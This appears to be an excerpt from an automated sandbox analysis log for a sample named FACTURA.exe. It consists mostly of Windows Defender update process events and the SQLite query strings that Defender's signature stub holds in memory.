Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-fad3e9a8.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process created: unknown unknown
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32
Source: C:\Users\user\Desktop\FACTURA.exe File created: C:\Users\user\AppData\Local\Temp\~DFB539126E96AF4C2D.TMP
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
